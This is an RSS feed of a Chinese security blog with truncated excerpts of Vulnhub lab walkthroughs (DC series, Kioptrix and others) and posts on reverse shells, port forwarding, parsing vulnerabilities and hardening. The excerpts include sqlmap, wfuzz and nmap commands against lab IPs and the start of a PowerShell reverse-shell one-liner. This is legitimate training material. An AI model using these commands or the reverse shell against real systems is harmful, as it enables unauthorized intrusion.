<?xml version="1.0" encoding="utf-8" ?><rss version="2.0"><channel><title><![CDATA[Nicky_Zheng的博客]]></title><description><![CDATA[]]></description><link>https://blog.csdn.net/Nicky_Zheng</link><language>zh-cn</language><generator>https://blog.csdn.net/</generator><copyright><![CDATA[Copyright &copy; Nicky_Zheng]]></copyright><item><title><![CDATA[【vulnhub】Kioptrix_level2 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113512583</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113512583</guid><author>Nicky_Zheng</author><pubDate>Mon, 01 Feb 2021 13:43:05 +0800</pubDate><description><![CDATA[1、信息收集
1.1、虚拟机发现扫描

使用netdiscover进行 arp 扫描，发现虚拟机 ip(192.168.57.140)

Currently scanning: 192.168.191.0/16   |   Screen View: Unique Hosts          
                                                                               
 3 Captured ARP Req/Rep pack]]></description><category></category></item><item><title><![CDATA[【vulnhub】Cherry靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113512401</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113512401</guid><author>Nicky_Zheng</author><pubDate>Mon, 01 Feb 2021 13:41:10 +0800</pubDate><description><![CDATA[1、信息收集
1.1、网段扫描
通过使用netdiscover 发现靶机ip为：192.168.57.141
1.2、端口扫描

使用nmap对靶机进行全端口扫描，同时启用服务探测、OS探测

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 14:12 CST]]></description><category></category></item><item><title><![CDATA[【vulnhub】BTRsys-2 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113375198</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113375198</guid><author>Nicky_Zheng</author><pubDate>Fri, 29 Jan 2021 11:35:05 +0800</pubDate><description><![CDATA[1、信息收集
1.1、端口扫描

使用netdiscor或arp获取到靶机 ip：192.168.57.137
使用nmap获取端口信息

kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( http]]></description><category></category></item><item><title><![CDATA[【vulnhub】Chili 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113374537</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113374537</guid><author>Nicky_Zheng</author><pubDate>Fri, 29 Jan 2021 11:26:53 +0800</pubDate><description><![CDATA[1、信息收集
1.1、端口扫描

已通过netdiscover发现靶机 ip：192.168.57.142

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST
Nmap scan report for 192.168.57.142
Host ]]></description><category></category></item><item><title><![CDATA[【vulnhub】SickOs1.2 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113174415</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113174415</guid><author>Nicky_Zheng</author><pubDate>Fri, 29 Jan 2021 11:18:19 +0800</pubDate><description><![CDATA[1、 信息收集
1.1、主机发现

使用netdiscover扫描靶机ip

kali@kali:~$ sudo netdiscover -i eth1
6 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 360               
 _____________________________________________________________________________
   IP            At M]]></description><category></category></item><item><title><![CDATA[【vulnhub】yone靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113174401</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113174401</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:16:45 +0800</pubDate><description><![CDATA[1、信息收集
##1.1、端口扫描及目录扫描
未发现敏感端口及目录，仅开启22/80端口，存在未授权下载，/media下，存在上传接口，无法解析PHP文件
2、权限获取

web 端未发现入口，通过medusa爆破出yone密码：12345qwert
通过searchsploit搜索到提权脚本，但靶机无gcc环境，无法编译

2.1、敏感信息收集

sudo -l 发现用户可以以sudo 权限运行restic程序，该程序可远程备份服务器文件

2.2、root目录备份


本地安装restic服务
sudo]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC9 - Knockd 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113174253</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113174253</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:12:43 +0800</pubDate><description><![CDATA[1、信息收集

使用netdiscover发现靶机 ip：192.168.57.155
使用nmap发现仅开放80端口

1.1、尝试注入

访问页面后，发现search疑似存在SQL注入
使用nmap测试

sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
 ]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC8 - exim4 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113174163</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113174163</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:08:41 +0800</pubDate><description><![CDATA[1、信息收集

端口扫描，发现仅开放 22/80端口，运行的CMS为drupal 7

2、SQL注入

访问一下页面，疑似存在注入



# sqlmap测试注入
$ sqlmap -u http://192.168.57.154/?nid=3 --dbs --batch
        ___
       __H__                                                                                              ]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC7 - Drupal drush靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113174069</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113174069</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:06:04 +0800</pubDate><description><![CDATA[1、信息收集

使用netdiscover发现靶机 ip 为：192.168.57.153
nmap扫描发现开放有 20/80端口，运行的CMS 为 Drupal 8
访问页面提示从其他入口下手
页面上存在 Twitter 账号，搜索可发现 github 地址
此处直接根据Twitter 账号 搜索 github，得到仓库地址dc7-user
存在config.php文件，里面记录有用户名和密码，尝试使用该用户名登陆服务器

&lt;?php
	$servername = "localhost";
	$us]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC6 - WordPress Active monitor靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113174029</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113174029</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:03:58 +0800</pubDate><description><![CDATA[作者提示爆破的用户名需要通过筛选rockyou中含有k01的内容作为字典

1、信息收集

通过端口扫描及目录扫描，确认为 WordPress，靶机ip为：192.168.57.152

1.1、应用扫描
wpscan --url http://wordy -e u,vp,vt --plugins-detection=aggressive
_______________________________________________________________
         __         .]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC5 - FUZZ 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113173995</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113173995</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:02:34 +0800</pubDate><description><![CDATA[本靶机需要借助fuzz测试本地文件包含漏洞

1、信息收集
1.1、端口扫描
nmap扫描后发现靶机仅开放的 80 端口存在突破可能，web界面无登陆功能
1.2、fuzz

访问页面 contact 界面填写内容后，url 中存在xxx=xxx的情况，可能存在文件包含、目录遍历

$ wfuzz -u http://192.168.57.151/thankyou.php?FUZZ=FUZ2Z -w /usr/share/wfuzz/wordlist/general/common.txt -w /home.]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC4 - 信息泄露 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113173929</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113173929</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 10:01:21 +0800</pubDate><description><![CDATA[1、信息收集
1.1、端口扫描
仅开放22、80端口，无其它服务开放
1.2、web扫描
仅一个登陆页面，使用 burp 爆破 admin 账号，得到密码happy。登陆后，页面为一个命令执行按钮，使用post方式提交请求，需要借助 burp 的 repeater 模块
1.3、信息收集

通过 repeater 模块，可以查看 passwd 内容及 home 下用户目录
jim 用户下存在信息泄露 mbox 及 backups 下的 old-passwords.bak 文件

2、获取权限

使用medu]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC3 - Joomla 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113173797</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113173797</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 09:59:00 +0800</pubDate><description><![CDATA[1、信息收集
1.1、端口扫描

sudo netdiscover -i eth0 发现靶机 ip：192.168.57.149

$ nmap -sSV -p 1-65535 --open -T4 -Pn -n -A --version-intensity=9 -oN /home/kali/Desktop/nmap_scan/192.168.57.149.txt 192.168.57.149
Nmap scan report for 192.168.57.149
Host is up (0.0013s l]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC2 - WordPress 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113173742</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113173742</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 09:54:14 +0800</pubDate><description><![CDATA[1、信息收集
1.1、端口扫描

netdiscover发现靶机ip : 192.168.57.148
nmap -sSV -A -Pn -n -p 1-65535 --version-intensity 9 192.168.57.148

Nmap scan report for 192.168.57.148
Host is up (0.00100s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp ]]></description><category></category></item><item><title><![CDATA[【vulnhub】【DC系列】DC1-Drupal 靶机]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/113173627</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/113173627</guid><author>Nicky_Zheng</author><pubDate>Tue, 26 Jan 2021 09:52:10 +0800</pubDate><description><![CDATA[1、信息收集
1.1、端口扫描
使用nmap对端口进行扫描，发现存在 80 端口开放，使用的 CMS 为 Drupal 7 (来自查看主页源代码)
1.2、漏洞信息收集
searchsploit发现 Drupal 7 存在 SQL 注入等漏洞，本次先使用 SQL 注入添加管理员账号
kali@kali:~$ searchsploit  Drupal 7.0
----------------------------------------------------------------------------]]></description><category></category></item><item><title><![CDATA[【信息安全】反弹shell]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/109645674</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/109645674</guid><author>Nicky_Zheng</author><pubDate>Wed, 02 Dec 2020 16:51:22 +0800</pubDate><description><![CDATA[1、windows-powershell反弹shell

kali作为服务端，windows使用powershell连接kali，并将自己的shell给kali


windows端

$client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($byte]]></description><category></category></item><item><title><![CDATA[【信息安全】端口转发]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/110129589</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/110129589</guid><author>Nicky_Zheng</author><pubDate>Wed, 02 Dec 2020 16:50:36 +0800</pubDate><description><![CDATA[一、SSH 端口转发篇
1、基于ssh实现本地端口转发，外网同内网主机间的通信

kali 已拿下 server1 的 ssh 权限，server1 和 server2 之间可以直接通信，且已经拿下 server2，kali 无法直接和 server2 通信 。通过端口转发，实现 kali 和 server 2 的直接通信


1.1、需要在 attack kali 上配置的内容

配置完成后，访问 kali 445 端口的流量将通过 ssh 转发到 server2 的 445 端口上

# 在 kali ]]></description><category></category></item><item><title><![CDATA[【信息安全】解析漏洞]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/110487690</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/110487690</guid><author>Nicky_Zheng</author><pubDate>Wed, 02 Dec 2020 16:49:33 +0800</pubDate><description><![CDATA[1、nginx解析漏洞
1.1、nginx 文件解析漏洞

nginx 文件解析漏洞是 nginx 中 PHP 配置不当而造成，与 nginx 版本无关。在高版本的 PHP 中，由于 security.limit_extensions 的引入，该漏洞难以再被利用。
 当请求中的 url 中路径名以 *.php 结尾，则 nginx 不管该文件是否存在，直接交给 PHP 处理。

1.2、nginx %00 截断漏洞

受该漏洞影响的 nginx 版本为0.5、0.6、0.7 ~ 0.7.65、0.8 ~ 0]]></description><category></category></item><item><title><![CDATA[【信息安全】安全加固]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/110483788</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/110483788</guid><author>Nicky_Zheng</author><pubDate>Wed, 02 Dec 2020 16:48:56 +0800</pubDate><description><![CDATA[1、web组件安全
1.1、Nginx安全


1.1.1、关闭列目录
默认情况下需要关闭该功能，除非提供下载等；

检查 autoindex 开关是否打开，nginx 配置文件中搜索 autoindex，确保 autoindex 配置为off；



1.1.2、关闭版本号显示
关闭版本号显示后，错误页面 http response server 字段将不会显示 Nginx 版本
	server {
		server_tokens off;
	}



1.1.3、访问控制


1.1.3.1、资源访问控]]></description><category></category></item><item><title><![CDATA[【信息安全】工具篇--子域名收集]]></title><link>https://blog.csdn.net/Nicky_Zheng/article/details/109469879</link><guid>https://blog.csdn.net/Nicky_Zheng/article/details/109469879</guid><author>Nicky_Zheng</author><pubDate>Tue, 03 Nov 2020 15:10:59 +0800</pubDate><description><![CDATA[工具篇–子域名收集
# 导入模块
import sys
from threading import Thread
from urllib.parse import urlparse
import requests
from bs4 import BeautifulSoup


# bing搜索子域名
def bing_search(site, page):
    headers = {
        'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; ]]></description><category></category></item></channel></rss>